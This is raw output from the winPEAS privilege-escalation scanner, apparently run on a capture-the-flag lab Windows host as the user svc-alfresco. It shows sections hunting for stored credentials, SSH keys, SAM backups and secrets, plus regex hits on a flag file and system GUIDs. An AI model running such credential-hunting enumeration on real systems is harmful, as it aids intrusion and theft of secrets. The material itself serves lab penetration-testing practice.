È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history                                                                              
  [X] Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.InteropServices.COMException: Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG))                  
   --- End of inner exception stack trace ---                                            
   at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters)  
   at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)                                                               
   at winPEAS.KnownFileCreds.Browsers.InternetExplorer.GetCurrentIETabs()                
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for GET credentials in IE history
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history                                                                              
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ IE favorites
    Not Found


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Interesting files and registry ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                                        

ÉÍÍÍÍÍÍÍÍÍ͹ Putty Sessions
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Putty SSH Host keys
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ SSH keys in registry
È If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#ssh-keys-in-registry                                                                                    
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ SuperPutty configuration files

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Office 365 endpoints synced by OneDrive.
                                                                                         
    SID: S-1-5-19
   =================================================================================================                                                                              

    SID: S-1-5-20
   =================================================================================================                                                                              

    SID: S-1-5-21-3072663084-364016917-1341370565-1147
   =================================================================================================                                                                              

    SID: S-1-5-18
   =================================================================================================                                                                              


ÉÍÍÍÍÍÍÍÍÍ͹ Cloud Credentials
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files                                                                      
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Unattend Files

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for common SAM & SYSTEM backups

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for McAfee Sitelist.xml Files

ÉÍÍÍÍÍÍÍÍÍ͹ Cached GPP Passwords

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for possible regs with creds
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry                                                                           
    Not Found
    Not Found
    Not Found
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for possible password files in users homes
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files                                                                      

ÉÍÍÍÍÍÍÍÍÍ͹ Searching for Oracle SQL Developer config files
                                                                                         

ÉÍÍÍÍÍÍÍÍÍ͹ Slack files & directories
  note: check manually if something is found

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for LOL Binaries and Scripts (can be slow)
È  https://lolbas-project.github.io/
   [!] Check skipped, if you want to run it, please specify '-lolbas' argument

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Outlook download files
                                                                                         

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating machine and user certificate files
                                                                                         

ÉÍÍÍÍÍÍÍÍÍ͹ Searching known files that can contain creds in home
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files                                                                      

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for documents --limit 100--
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Office Most Recent Files -- limit 50
                                                                                         
  Last Access Date           User                                           Application           Document                                                                        

ÉÍÍÍÍÍÍÍÍÍ͹ Recent files --limit 70--
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Looking inside the Recycle Bin for creds files
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files                                                                      
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Searching hidden files or folders in C:\Users home (can be slow)
                                                                                         
     C:\Users\Default
     C:\Users\Default User
     C:\Users\Default
     C:\Users\All Users

ÉÍÍÍÍÍÍÍÍÍ͹ Searching interesting files in other users home directories (can be slow)
                                                                                         
  [X] Exception: Object reference not set to an instance of an object.

ÉÍÍÍÍÍÍÍÍÍ͹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)                                                                  
     File Permissions "C:\Users\svc-alfresco\Documents\winPEASx64.exe": svc-alfresco [AllAccess]

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Linux shells/distributions - wsl.exe, bash.exe


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ File Analysis ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍ͹ Found CERTSB4 Files
File: C:\Users\All Users\VMware\VMware Tools\GuestProxyData\server\key.pem
                   
ÉÍÍÍÍÍÍÍÍÍ͹ Found Misc-IPs Regexes
C:\Users\All Users\VMware\VMware CAF\pme\data\input\providerReg\caf_InstallProvider_1_0_0.xml: 10.25.57.32

ÉÍÍÍÍÍÍÍÍÍ͹ Found Misc-Usernames Regexes
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: username = $null,

ÉÍÍÍÍÍÍÍÍÍ͹ Found Misc-Net user add Regexes
C:\Users\All Users\VMware\VMware CAF\pme\scripts\setUpVgAuth.bat: net user testuser /add

ÉÍÍÍÍÍÍÍÍÍ͹ Found Misc-Code asigning passwords Regexes
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: password = $null,

ÉÍÍÍÍÍÍÍÍÍ͹ Found Misc-Config Secrets Regexes
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: $env:

ÉÍÍÍÍÍÍÍÍÍ͹ Found Misc-Simple Passwords Regexes
C:\Users\All Users\VMware\VMware CAF\pme\install\caf-dbg.ps1: password = $null,

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Adafruit API Key Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c93964b402e

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Confluent Access Token & Secret Key Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bc
C:\Users\svc-alfresco\Desktop\user.txt: ab8f5c93964b402e

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Etsy Access Token Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c93

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Mattermost Access Token Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c9396

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Nytimes Access Token Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c93964b402e

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Plaid Client ID Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c93

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Plaid Secret key Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c93964b40

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-SumoLogic Access ID Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5
C:\Users\svc-alfresco\Desktop\user.txt: bcab8f5c93964b

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Travis CI Access Token Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Kucoin Secret Key Regexes
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: e35be42d-f742-4d96-a50a-1775fb1a7a42
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 16c5d1ee-eac2-483e-a79a-0bc83c814682
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 0ecef634-6ef0-472a-8085-5ad023ecbccd
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 08811c8c-98c7-4641-b10a-0d01110f77d9
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 0ecef634-6ef0-472a-8085-5ad023ecbccd
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 1fd54023-b682-410a-af25-30b5de19e6bf
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 0ecef634-6ef0-472a-8085-5ad023ecbccd
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: f9820abf-af33-46c1-8e82-f45b948629a0
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53808008-07bb-4661-bc3c-b5953e708560
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: bfc341ac-d9d6-47fe-88b1-f66586dd9e6e
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53808008-07bb-4661-bc3c-b5953e708560
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53808008-07bb-4661-bc3c-b5953e708560
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53f56307-b6bf-11d0-94f2-00a0c91efb8b
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-MojoAuth API Key Regexes
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: e35be42d-f742-4d96-a50a-1775fb1a7a42
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 16c5d1ee-eac2-483e-a79a-0bc83c814682
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 0ecef634-6ef0-472a-8085-5ad023ecbccd
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 08811c8c-98c7-4641-b10a-0d01110f77d9
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 0ecef634-6ef0-472a-8085-5ad023ecbccd
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 1fd54023-b682-410a-af25-30b5de19e6bf
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 0ecef634-6ef0-472a-8085-5ad023ecbccd
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: f9820abf-af33-46c1-8e82-f45b948629a0
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53808008-07bb-4661-bc3c-b5953e708560
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: bfc341ac-d9d6-47fe-88b1-f66586dd9e6e
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53808008-07bb-4661-bc3c-b5953e708560
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53808008-07bb-4661-bc3c-b5953e708560
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53f56307-b6bf-11d0-94f2-00a0c91efb8b
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Sendbird Access ID Regexes
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: e35be42d-f742-4d96-a50a-1775fb1a7a42
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 16c5d1ee-eac2-483e-a79a-0bc83c814682
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 0ecef634-6ef0-472a-8085-5ad023ecbccd
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 08811c8c-98c7-4641-b10a-0d01110f77d9
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 0ecef634-6ef0-472a-8085-5ad023ecbccd
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 1fd54023-b682-410a-af25-30b5de19e6bf
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 0ecef634-6ef0-472a-8085-5ad023ecbccd
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: f9820abf-af33-46c1-8e82-f45b948629a0
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53808008-07bb-4661-bc3c-b5953e708560
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: bfc341ac-d9d6-47fe-88b1-f66586dd9e6e
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53808008-07bb-4661-bc3c-b5953e708560
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53808008-07bb-4661-bc3c-b5953e708560
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 53f56307-b6bf-11d0-94f2-00a0c91efb8b
